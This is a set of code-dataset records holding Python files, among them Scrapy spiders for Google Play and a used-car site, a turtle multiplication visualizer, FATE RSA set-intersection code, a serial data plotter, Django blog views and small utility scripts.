url.xpath('div[@class=\"details\"]/div[@class=\"subtitle-container\"]/a/@href')[0].extract()\n try:\n star = url.xpath('div[@class=\"reason-set\"]/span/a/div/div/@aria-label')[0].extract()\n except:\n star = 'no star_rate'\n star_rates = star\n\n # use a POST request to fetch 100 entries\n request = scrapy.FormRequest( \n targetURL,\n formdata = {'start':'0',\n 'num':'1',\n 'numChildren':'0',\n 'cctcss':'square-cover',\n 'cllayout':'NORMAL',\n 'ipf':'1',\n 'xhr':'1',\n 'token':'zNTXc17yBEzmbkMlpt4eKj14YOo:1458833715345'},\n callback = self.parse_data,\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'},\n cookies = {'cookie-key': '_ga=GA1.2.259790884.1552095104; __qca=P0-52365157-1552095104157; __gads=ID=2c4091f81a0034fa:T=1552184369:S=ALNI_MbjxZVq-WfZ8xsrvjXMKBhCeCh_tg; notice-ctt=4%3B1552860610439; _gid=GA1.2.1799586118.1553292208'}\n )\n request.meta['table_title'] = table_title.strip()\n request.meta['title'] = title.strip()\n request.meta['imgURL'] = imgURL.strip()\n request.meta['description'] = description.strip()\n request.meta['autor'] = autor.strip()\n request.meta['autor_URL'] = autor_URL.strip()\n request.meta['star_rates'] = star_rates.strip()\n yield request\n\n if total == 200:\n break\n\n\n def parse_data(self, response): \n # extract each field; when using xpath to reach a nested element, walk down one level at a time instead of skipping levels, otherwise nothing is matched\n playitem = GooglePlaySpiderItem()\n \n playitem['title'] = response.meta['title']\n playitem['imgURL'] = response.meta['imgURL']\n playitem['description'] = response.meta['description']\n playitem['autor'] = response.meta['autor']\n playitem['autor_URL'] = response.meta['autor_URL']\n playitem['star_rates'] = response.meta['star_rates']\n playitem['table_title']= response.meta['table_title']\n\n cat = []\n for label in response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[1]/div/div[2]/div/div[1]/div/div[1]/div[1]/span[@class=\"T32cc UAO9ie\"]'):\n label_name = label.xpath('a/text()')[0].extract()\n if label_name != playitem['autor']:\n cat.append(label_name.strip()[:5000])\n playitem['category'] = \"\".join(cat)\n\n price = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[1]/div/div[2]/div/div[2]/div/div[2]/div[2]/c-wiz/c-wiz/div/span/button')[0].extract()\n details = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[3]/div/div[1]/meta/@content')[0].extract()\n five_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[1]/span[2]/@style')[0].extract()\n four_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[2]/span[2]/@style')[0].extract()\n three_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[3]/span[2]/@style')[0].extract()\n two_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[4]/span[2]/@style')[0].extract()\n one_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[5]/span[2]/@style')[0].extract()\n \n rev = []\n for review in response.xpath('//div[@class=\"zc7KVe\"]/div[@class=\"d15Mdf bAhLNe\"]/div[@class=\"UD7Dzf\"]'):\n rev.append(review.xpath('span[1]/text()')[0].extract())\n playitem['reviews'] = \"\".join(rev)\n\n size = 
response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[3]/div[1]/div[2]/div/div[3]/span/div/span/text()')[0].extract()\n installs = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[3]/div[1]/div[2]/div/div[4]/span/div/span/text()')[0].extract()\n\n playitem['price'] = price.strip()[:-4]\n playitem['details'] = details.strip()[:100000]\n playitem['five_ratings'] = five_ratings.strip()[7:]\n playitem['four_ratings'] = four_ratings.strip()[7:]\n playitem['three_ratings'] = three_ratings.strip()[7:]\n playitem['two_ratings'] = two_ratings.strip()[7:]\n playitem['one_ratings'] = one_ratings.strip()[7:]\n playitem['size'] = size.strip()\n playitem['installs'] = installs.strip()[:-1]\n\n yield playitem\n \n\n","sub_path":"detail/google_play_spider/spiders/googleplaySpider.py","file_name":"googleplaySpider.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348360415","text":"#William Ambrozic 2018\nfrom turtle import *\nimport Tkinter as tk\nfrom tkColorChooser import askcolor\nfrom mingus.midi import fluidsynth\nfluidsynth.init('/usr/share/sounds/sf2/FluidR3_GM.sf2',\"alsa\")\n\ndef getDots(Link, view):\n scale = 6 #increases / decreases the size of the patterns to a factor of scale\n t.tracer(0)\n for x in range(numONodes.get()):\n if (rainbow.get() == 0): t.dot(5, nodeColor.get())\n Link[x] = t.position()\n t.forward(scale * 360.0/numONodes.get()) #I want all of the shapes to be the same relative size\n t.left(360.0/numONodes.get()) #After simplifying (n-2) * 180 given that I need to find the complementary angle\n return Link\n\ndef createPoly(view):\n colors = [\"#660000\", \"#990000\", \"#CC0000\", \"#FF0000\", \"#CC3333\", \"#FF6666\", \"#FF9999\", \"#FFCCCC\", \"#663300\", \"#993300\",\n \"#CC3300\", \"#FF3300\", \"#FF6600\", \"#FF6633\", \"#FF9966\", \"#FFCC99\", \"#996633\", \"#CC9900\", \"#FFCC00\", \"#FFFF00\",\n \"#FFFF33\", \"#FFFF66\", \"#FFFF99\", \"#FFFFCC\", \"#003300\", \"#006600\", \"#009900\", \"#00CC00\", \"#00FF00\", \"#66FF66\",\n \"#CCFFCC\", \"#003333\", \"#336666\", \"#009999\", \"#00CCCC\", \"#66CCCC\", \"#66FFCC\", \"#99FFCC\", \"#003399\", \"#0033FF\",\n \"#0066FF\", \"#00CCFF\", \"#00FFFF\", \"#99FFFF\", \"#CCFFFF\", \"#000066\", \"#000099\", \"#0000CC\", \"#0000FF\", \"#3366FF\",\n \"#3399FF\", \"#66CCFF\", \"#99CCFF\", \"#330066\", \"#660099\", \"#663399\", \"#9900CC\", \"#9933FF\", \"#9966FF\", \"#9999FF\",\n \"#CCCCFF\", \"#660066\", \"#990066\", \"#CC0099\", \"#FF0099\", \"#FF00FF\", \"#FF66FF\", \"#FF99FF\", \"#FFCCFF\"]\n Link = [0] * int(numONodes.get()) #Creating list to connect nodes, rounds any floats\n t.color(lineColor.get())\n t.speed(0)\n t.penup()\n Link = getDots(Link, view)\n if view:\n t.tracer(0)\n else:\n t.tracer(1)\n for x in range(numONodes.get()):\n if rainbow.get() == 1: t.color(colors[x % 69])\n t.penup()\n t.goto(Link[x])\n t.pendown()\n value = int(x * float(degree.get()))\n fluidsynth.play_Note(value % 100,100)\n if (value >= numONodes.get()):\n t.goto(Link[value % numONodes.get()])\n else:\n t.goto(Link[value])\n if (rainbow.get() == 0): t.dot(5, hitNodeColor.get())# before it goes back change the color of the targeted node\n t.goto(Link[x])\n t.penup()\n t.goto(Link[0]) #The pen needs to go back to the start so the next pattern can be drawn\n done()\n\ndef changeLineColor():\n color = askcolor()[1]\n lineColor.set(color)\n canvas.itemconfig(Line, fill = color)\n\ndef 
changeBackColor():\n t.screen.bgcolor(askcolor()[1])\n\ndef changeNodeColor():\n nodeColor.set(askcolor()[1])\n\ndef changeHitNodeColor():\n hitNodeColor.set(askcolor()[1])\n\nroot = tk.Tk()\nroot.title('Multiplication Visualizer')\ncanvas = tk.Canvas(master = root, width = 800, height = 800)\n#root.resizable(False, False)\ncanvas.pack()\nfluidsynth.init(\"soundfont.SF2\")\n\nt = RawTurtle(canvas)\nt.ht() #Hides cursor\nt.screen.bgcolor('black')\nt.penup()\nt.sety(-330)\nt.pensize(1)\n\nnumONodes = tk.IntVar()\ne2 = tk.Scale(master = root, from_=50, to=1000, variable=numONodes, length=700, orient=tk.HORIZONTAL).pack(side = tk.BOTTOM)\nnumONodes.set(360)\n\ndegree = tk.StringVar()\ndegree.set(\"101\")\ne2 = tk.Entry(master = root, textvariable=degree).pack(side = tk.TOP)\n\nlineColor = tk.StringVar()\nlineColor.set(\"red\")\nnodeColor = tk.StringVar()\nnodeColor.set(\"red\")\nhitNodeColor = tk.StringVar()\nhitNodeColor.set(\"red\")\n\nrainbow = tk.IntVar()\nrainbow.set(0)\nRainbow = tk.Checkbutton(master = root, text=\"Rainbow\", variable=rainbow).pack(side = tk.LEFT)\n\nView = tk.Button(master = root, text = \"View\", command = lambda: createPoly(True)).pack(side = tk.RIGHT)\nDraw = tk.Button(master = root, text = \"Draw\", command = lambda: createPoly(False)).pack(side = tk.RIGHT)\nClear = tk.Button(master = root, text = \"Clear\", command = t.clear).pack(side = tk.RIGHT)\nBackColor = tk.Button(master = root, text = \"Background Color\", command = changeBackColor).pack(side = tk.RIGHT)\nLineColor = tk.Button(master = root, text = \"Line Color\", command = changeLineColor).pack(side = tk.RIGHT)\nNodeColor = tk.Button(master = root, text = \"Node Color\", command = changeNodeColor).pack(side = tk.RIGHT)\nHitNodeColor = tk.Button(master = root, text = \"Hit Node Color\", command = changeHitNodeColor).pack(side = tk.RIGHT)\n\nroot.mainloop()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460736073","text":"#\r\n# Copyright 2019 The FATE Authors. 
All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n\r\nimport hashlib\r\nfrom arch.api.federation import remote, get\r\nfrom arch.api.utils import log_utils\r\nfrom federatedml.secureprotol import gmpy_math\r\nfrom federatedml.secureprotol.encrypt import RsaEncrypt\r\nfrom federatedml.statistic.intersect import RawIntersect\r\nfrom federatedml.statistic.intersect import RsaIntersect\r\nfrom federatedml.util import consts\r\nfrom federatedml.util.transfer_variable import RsaIntersectTransferVariable\r\n\r\nLOGGER = log_utils.getLogger()\r\n\r\n\r\nclass RsaIntersectionHost(RsaIntersect):\r\n def __init__(self, intersect_params):\r\n super().__init__(intersect_params)\r\n\r\n self.get_intersect_ids_flag = intersect_params.is_get_intersect_ids\r\n self.transfer_variable = RsaIntersectTransferVariable()\r\n\r\n self.e = None\r\n self.d = None\r\n self.n = None\r\n\r\n @staticmethod\r\n def hash(value):\r\n return hashlib.sha256(bytes(str(value), encoding='utf-8')).hexdigest()\r\n\r\n def run(self, data_instances):\r\n LOGGER.info(\"Start rsa intersection\")\r\n\r\n encrypt_operator = RsaEncrypt()\r\n encrypt_operator.generate_key(rsa_bit=1024)\r\n self.e, self.d, self.n = encrypt_operator.get_key_pair()\r\n LOGGER.info(\"Generate rsa keys.\")\r\n public_key = {\"e\": self.e, \"n\": self.n}\r\n remote(public_key,\r\n name=self.transfer_variable.rsa_pubkey.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.rsa_pubkey),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote public key to Guest.\")\r\n\r\n # (host_id_process, 1)\r\n host_ids_process_pair = data_instances.map(\r\n lambda k, v: (\r\n RsaIntersectionHost.hash(gmpy_math.powmod(int(RsaIntersectionHost.hash(k), 16), self.d, self.n)), k)\r\n )\r\n\r\n host_ids_process = host_ids_process_pair.mapValues(lambda v: 1)\r\n remote(host_ids_process,\r\n name=self.transfer_variable.intersect_host_ids_process.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_host_ids_process),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote host_ids_process to Guest.\")\r\n\r\n # Recv guest ids\r\n guest_ids = get(name=self.transfer_variable.intersect_guest_ids.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_guest_ids),\r\n idx=0)\r\n LOGGER.info(\"Get guest_ids from guest\")\r\n\r\n # Process guest ids and return to guest\r\n guest_ids_process = guest_ids.map(lambda k, v: (k, gmpy_math.powmod(int(k), self.d, self.n)))\r\n remote(guest_ids_process,\r\n name=self.transfer_variable.intersect_guest_ids_process.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_guest_ids_process),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote guest_ids_process to Guest.\")\r\n\r\n # recv intersect ids\r\n intersect_ids = None\r\n if self.get_intersect_ids_flag:\r\n encrypt_intersect_ids = get(name=self.transfer_variable.intersect_ids.name,\r\n 
tag=self.transfer_variable.generate_transferid(\r\n self.transfer_variable.intersect_ids),\r\n idx=0)\r\n\r\n intersect_ids_pair = encrypt_intersect_ids.join(host_ids_process_pair, lambda e, h: h)\r\n intersect_ids = intersect_ids_pair.map(lambda k, v: (v, \"intersect_id\"))\r\n LOGGER.info(\"Get intersect ids from Guest\")\r\n\r\n if not self.only_output_key:\r\n intersect_ids = self._get_value_from_data(intersect_ids, data_instances)\r\n\r\n return intersect_ids\r\n\r\n\r\nclass RawIntersectionHost(RawIntersect):\r\n def __init__(self, intersect_params):\r\n super().__init__(intersect_params)\r\n self.join_role = intersect_params.join_role\r\n self.role = consts.HOST\r\n\r\n def run(self, data_instances):\r\n LOGGER.info(\"Start raw intersection\")\r\n\r\n if self.join_role == consts.GUEST:\r\n intersect_ids = self.intersect_send_id(data_instances)\r\n elif self.join_role == consts.HOST:\r\n intersect_ids = self.intersect_join_id(data_instances)\r\n else:\r\n raise ValueError(\"Unknown intersect join role, please check the configure of host\")\r\n\r\n return intersect_ids\r\n","sub_path":"federatedml/statistic/intersect/intersect_host.py","file_name":"intersect_host.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"484174525","text":"# coding:utf-8\r\n\r\nimport time\r\nimport threading\r\n\r\nimport MySerial_robot\r\nimport MyParse\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\n\r\n\r\ndef allow(spaces):\r\n a = str(spaces) + \"----->>\"\r\n b = \" \" * spaces\r\n print(b + a)\r\n\r\n\r\nclass Pararell:\r\n\r\n def __init__(self): # {{{\r\n self.X = 0.0\r\n self.Y = 0.0\r\n self.Vx = 0.0\r\n self.Vy = 0.0\r\n self.Theata = 0.0\r\n\r\n self.thread1 = threading.Thread(target=self.target1)\r\n self.thread1.start()\r\n\r\n self.thread2 = threading.Thread(target=self.target2)\r\n self.thread2.start()\r\n\r\n# }}}\r\n\r\n def target1(self): # {{{\r\n ser = MySerial_robot.MySerial()\r\n\r\n ser.getPortInfo_Auto()\r\n ser.openPort()\r\n\r\n cnt = 0\r\n while(True):\r\n line = MyParse.MyParse(ser.getSerial())\r\n line.refine()\r\n\r\n if(line.getLabel() == \"@gX_acc\"):\r\n # self.Vx = line.getValue()\r\n print(\"gX_acc\", self.Vx, \"\\n\")\r\n\r\n # elif(line.getLabel() == \"@gY_acc\"):\r\n # self.Vy = line.getValue()\r\n # print(\"gY_acc\", self.Vy, \"\\n\")\r\n #\r\n # elif(line.getLabel() == \"@X\"):\r\n # self.X = line.getValue()\r\n # print(\"X\", self.Vy, \"\\n\")\r\n #\r\n # elif(line.getLabel() == \"@Y\"):\r\n # self.Y = line.getValue()\r\n # print(\"Y\", self.Y, \"\\n\")\r\n #\r\n elif(line.getLabel() == \"@gAngle\"):\r\n temp = line.getValue()\r\n if(temp < 0):\r\n print(\"<><><><><><><><><><><><><><><><><><><>\\n\\n\")\r\n self.Theata = 180 - temp\r\n self.Theata = temp\r\n print(\"gAngle\", self.Theata, \"\\n\")\r\n\r\n # allow(cnt % 50)\r\n cnt += 1\r\n\r\n ser.closePort()\r\n\r\n# }}}\r\n\r\n def target2(self):\r\n time.sleep(2)\r\n print(\"-------------------------------------------------------\")\r\n\r\n # memBuff affects array size and finess\r\n # speed affects plotting followability\r\n memBuff = 10\r\n speed = 0.0005\r\n # speed = 0.05\r\n\r\n fig = plt.figure(figsize=(16, 10), facecolor=\"w\", edgecolor=\"w\")\r\n gs = gridspec.GridSpec(2, 2)\r\n\r\n # for liner_plot\r\n ax1 = fig.add_subplot(gs[0, :])\r\n\r\n # for scatter_plot\r\n ax2 = fig.add_subplot(gs[1, 0])\r\n\r\n # for polar_plot\r\n ax3 = 
fig.add_subplot(gs[1, 1], projection='polar')\r\n\r\n # initialize data_arrays\r\n t = np.arange(0, 1, 1 / memBuff)\r\n Vx = np.arange(0, 1, 1 / memBuff)\r\n Vy = np.arange(0, 1, 1 / memBuff)\r\n X = np.arange(0, 1, 1 / memBuff)\r\n Y = np.arange(0, 1, 1 / memBuff)\r\n r = np.ones(memBuff)\r\n theata = 2 * np.pi * r\r\n\r\n # for liner_plot\r\n lines1_1, = ax1.plot(t, Vx, label=\"Vx\")\r\n lines1_2, = ax1.plot(t, Vy, label=\"Vy\")\r\n # for scatter_plot\r\n lines2, = ax2.plot(X, Y, color=\"c\",\r\n marker=r'o', markersize=20, alpha=0.3)\r\n\r\n # for polar_plot\r\n lines3, = ax3.plot(theata, r, color=\"g\", alpha=0.3,\r\n markersize=15, marker=\"o\", linewidth=1)\r\n\r\n # plt.grid()\r\n plt.tight_layout()\r\n\r\n # ##################################################################\r\n\r\n print(\"---------------------------------------------------\")\r\n\r\n while True:\r\n\r\n # for liner_plot\r\n lines1_1.set_data(t, [Vx[i] for i in range(memBuff)])\r\n lines1_2.set_data(t, [Vy[i] for i in range(memBuff)])\r\n\r\n # for scatter_plot\r\n lines2.set_data([X[i]for i in range(memBuff)],\r\n [Y[i]for i in range(memBuff)])\r\n\r\n # for polar_plot\r\n lines3.set_data([theata[i]for i in range(memBuff)],\r\n [r[i]for i in range(memBuff)])\r\n\r\n # update\r\n t += 0.1\r\n # once the y-axis list size exceeds memBuff, discard the oldest elements\r\n if(Vx.size > memBuff):\r\n Vx = Vx[1:]\r\n Vy = Vy[1:]\r\n X = X[1:]\r\n Y = Y[1:]\r\n theata = theata[1:]\r\n r = r[1:]\r\n\r\n # #################################################\r\n Vx = np.append(Vx, self.Vx)\r\n Vy = np.append(Vy, self.Vy)\r\n X = np.append(X, self.X)\r\n Y = np.append(Y, self.Y)\r\n\r\n theata = np.append(theata, self.Theata)\r\n\r\n r = np.append(r, 1.0)\r\n\r\n # #################################################\r\n\r\n # for liner_plot\r\n ax1.set_xlim((t.min() - 0.2, t.max() + 0.2))\r\n ax1.set_ylim((Vx.min() - 0.2, Vx.max() + 0.2))\r\n # ax1.set_ylim(-0.1, 1.1)\r\n\r\n ax1.set_xlabel(\"$Time(s)$\")\r\n ax1.grid(True)\r\n ax1.legend()\r\n\r\n # for scatter_plot\r\n # ax2.set_xlim((X.min() - 0.2, X.max() + 0.2))\r\n # ax2.set_xlim((Y.min() - 0.2, Y.max() + 0.2))\r\n ax2.set_xlim(-0.1, 1.1)\r\n ax2.set_ylim(-0.1, 1.1)\r\n\r\n ax2.set_xlabel(\"$X$\")\r\n ax2.set_ylabel(\"$Y$\")\r\n ax2.grid(True)\r\n\r\n # for polar_plot\r\n ax3.set_rmax(1.5)\r\n ax3.grid(True)\r\n\r\n plt.pause(speed)\r\n\r\n\r\nif(__name__ == \"__main__\"):\r\n hoge = Pararell()\r\n","sub_path":"main_alpha_robot.py","file_name":"main_alpha_robot.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457309984","text":"def title_case(title, minor_words=''):\n title = title.capitalize().split()\n minor_words = minor_words.lower().split()\n return ' '.join([word if word in minor_words else word.capitalize() for\n word in title])\n\nif __name__ == \"__main__\":\n print(title_case('a clash of KINGS', 'a an the of'));\n print(title_case('THE WIND IN THE WILLOWS', 'The In'));\n print(title_case('the quick brown fox', 'The Quick Brown Fox'));\n","sub_path":"title-case.py","file_name":"title-case.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594719553","text":"from fpdf import FPDF\n\npdf = FPDF()\n\npdf.add_page()\n\npdf.set_font(\"Arial\", size=15)\n\nfd = open(\"bi content.txt\", \"r\")\nfor i in fd:\n pdf.cell(200, 10, txt=i, ln=1, align=\"C\")\n\npdf.output(\"BI.pdf\")\nprint(\"successfully PDF 
Created:\")\n","sub_path":"PDFfileconverter.py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131652615","text":"from django.http import HttpResponse, Http404\nfrom django.template import loader\nfrom django.shortcuts import render,get_object_or_404\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Hh_vacancy, Vacancy, Responsibility, Vendors_technologies, Post,Basic\n\ndef index(request):\n vacancy_p = Hh_vacancy.objects.order_by('id')[:6]\n post = Post.objects.order_by('id')[:3]\n return render(request, 'blog/index.html', {'vacancy_p': vacancy_p,'post': post})\n\n\ndef detail(request, id):\n try:\n vacancy = Vacancy.objects.get(vacancy_id=id)\n competences = Responsibility.objects.filter(vacancy_id=id).first()\n list_competences = competences.name_list.replace('[','').replace(']','').replace(\"'\",\"\")\n list_competences = list_competences.split(',')\n list_associated = competences.associated.split(',')\n vend_tehn = Vendors_technologies.objects.filter(name__in=[associated for associated in list_associated])\n except Vacancy.DoesNotExist:\n raise Http404(\"Vacnacy does not exist\")\n return render(request, 'blog/detail.html', {'vacancy': vacancy, 'competences': list_competences , 'associated' : vend_tehn })\n\n\ndef listing(request):\n vacancy_list =Hh_vacancy.objects.all()\n paginator = Paginator(vacancy_list, 25) # Show 25 contacts per page\n page = request.GET.get('page')\n vacancy_p = paginator.get_page(page)\n return render(request, 'blog/listing.html', {'vacancy_p': vacancy_p})\n\ndef vend_teh(request, name):\n try:\n vendors_technologies = Vendors_technologies.objects.get(name=name)\n except Vendors_technologies.DoesNotExist:\n raise Http404(\"DoesNotExist\")\n return render(request, 'blog/vendor_tehn.html', {'vendors_technologies': vendors_technologies})\n\ndef post_list(request):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'blog/post_list.html', {'posts': posts})\n\ndef detail_post(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/detail_post.html', {'post': post})\n\ndef basic(request, pk):\n basic = get_object_or_404(Basic, pk=pk)\n return render(request, 'blog/basic_detail.html', {'basic': basic})\n\ndef vend_teh_list(request):\n posts = Vendors_technologies.objects.all()\n return render(request, 'blog/vendor_tehn_list.html', {'posts': posts})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415524262","text":"# Given a pointer to the first node in the list and a value, create a new node, assign it to the list head and return a pointer to the new head node\n\n# import the list class and node class\nimport sys\nfrom os.path import dirname, abspath\n\nmainDir = dirname(dirname(abspath(__file__)))\nsys.path.append(mainDir)\n\nfrom listNode import Node\nfrom singleList import List\n\n# import the random module\nfrom random import randrange\n\n# Create a new list and populate it\nnewSList = List()\nfor i in range(0, 10):\n newSList.add(randrange(100))\n\n# function to add given value to the beginning of the list\ndef addFront(list, head, val):\n newNode = Node(val)\n if head:\n newNode.next = head\n\n 
list.setHeadNode(newNode)\n list.recalculateLength()\n return list.getHeadNode()\n\n# print the existing list\nprint('The original list is {} - length is {}'.format(newSList.show(), newSList.length()))\n\n# add the value to the front and display results\nmyVal = 42\nprint('{}'.format(addFront(newSList, newSList.getHeadNode(), myVal)))\n\n# print the list after the addition\nprint('The new list is {} - length is {}'.format(newSList.show(), newSList.length()))\n","sub_path":"Chapter-05-Linked-Lists/SList-Add-Front/SList-Add-Front.py","file_name":"SList-Add-Front.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434453314","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport threading\nimport time\nimport json\nimport pprint\nfrom random import randint\nimport math\nimport datetime\n\ndef gen_headers():\n referers = ['tw.yahoo.com', 'www.google.com', 'http://www.msn.com/zh-tw/', 'http://www.pchome.com.tw/']\n user_agents = ['Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)']\n headers = {'user-agent': user_agents[randint(0, len(user_agents) - 1)],\n 'referer': referers[randint(0, len(referers) - 1)]}\n return headers\n\n\n# get total number of cars\ndef get_car_no(url):\n res = requests.get(url)\n js = json.loads(res.text)\n car_no = int(js['data']['total'])\n\n return car_no\n\n\n# get url and first info group(without doors, color, gasoline, equip)\ndef get_car_urls(brand_list, car_no, headers, file_out):\n\n page_no = math.ceil(car_no / 20)\n for page in range(1, page_no + 1):\n count = 0\n\n # try 3 requests\n while count < 3:\n\n try:\n url = 'https://auto.8891.com.tw/usedauto-search.html?page={}'.format(page)\n res = requests.get(url, headers=headers)\n # each page's response from 8891 returns a JSON of 20 cars (12 fields are taken directly from it)\n js = json.loads(res.text.lower())\n data = \"\"\n for i in range(1, len(js['data']['data'].keys()) + 1):\n info = js['data']['data'][str(i)]\n if (info['auto_brand_en'].upper() in brand_list):\n carDic = {'source': '8891'}\n carDic['url'] = 'https://auto.8891.com.tw/usedauto-infos-{}.html'.format(info['id'])\n carDic['title'] = info['auto_title_all']\n carDic['brand'] = info['auto_brand_en']\n carDic['model'] = info['item_kind_name_en']\n carDic['cc'] = int(float(info['auto_gas_size'].lower().split('l')[0]) * 1000)\n carDic['transmission'] = info['auto_tab_name']\n mile_search = re.search(r'[0-9.]+', info['auto_mileage_num'])\n wen_search = re.search(r'萬', info['auto_mileage_num'])\n if mile_search:\n if wen_search:\n carDic['mileage'] = int(float(mile_search.group()) * 10000)\n else:\n carDic['mileage'] = int(float(mile_search.group()))\n else:\n carDic['mileage'] = -1\n carDic['years'] = int(re.search(r'[0-9]+', info['auto_year_type']).group())\n carDic['location'] = info['auto_address']\n date_str = info['item_post_date']\n carDic['posttime'] = int(datetime.datetime.strptime(date_str, \"%Y-%m-%d %H:%M:%S\").timestamp())\n carDic['price'] = float(info['auto_price'])\n data += \"{}|{}|{}\\n\".format(carDic['url'], carDic['posttime'],\n json.dumps(carDic, ensure_ascii=False))\n else:\n continue # jump over 
the car where its brand is not in our brand_list\n\n # each page writes out 20 lines of data; each line's format: \"url|posttime(string)|{dictionary already holding 12 fields}\"\n with open(file_out, 'a') as f:\n f.write(data)\n # save progress to csv\n with open('progress.csv', 'w') as f:\n f.write('{}\\n'.format(page))\n break # after successfully writing data, break while\n except Exception as e:\n count += 1\n if count == 3:\n message = 'fail page:{},error:{}'.format(page, e)\n # print the exception directly\n print(message)\n finally:\n time.sleep(0.2)\n\nif __name__=='__main__':\n headers= gen_headers()\n car_no= get_car_no()\n brand_list = ['AUDI', 'MERCEDES-BENZ', 'BMW', 'FORD', 'HONDA', 'LEXUS', 'MAZDA', 'MITSUBISHI',\n 'NISSAN', 'PORSCHE', 'SUZUKI', 'SUBARU', 'TOYOTA', 'VOLVO', 'VOLKSWAGEN']\n fileOut='url.txt'\n\n # for testing, you can set car_no to 100 yourself (crawl only 100 cars)\n get_car_urls(brand_list, car_no, headers, fileOut)\n","sub_path":"8891_url.py","file_name":"8891_url.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228899821","text":"\"\"\"nushellx_lpt/parser.py\nFunctions for parsing *.lpt files and generating maps from the data\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os import sep, path, walk\n\nfrom constants import FN_PARSE_LPT_RGX_FNAME_INT as _RGX_FNAME_INT\nfrom constants import F_PARSE_INT_CMNT_STR as _INT_CMNT_STR\nfrom constants import F_PARSE_INT_CMNT_ZBT as _INT_CMNT_STR_ZBT\nfrom constants import F_PARSE_LPT_COL_START_SPE as _COL_START_SPE\nfrom constants import F_PARSE_LPT_NCOLS_STATE as _NCOLS_STATE\nfrom constants import F_PARSE_LPT_ROW_AZ as _ROW_AZ\nfrom constants import F_PARSE_LPT_ROW_SPE as _ROW_SPE\nfrom constants import F_PARSE_LPT_ROW_START_STATES as _ROW_STATES_START\nfrom constants import F_PARSE_LPT_STR_CMNT as 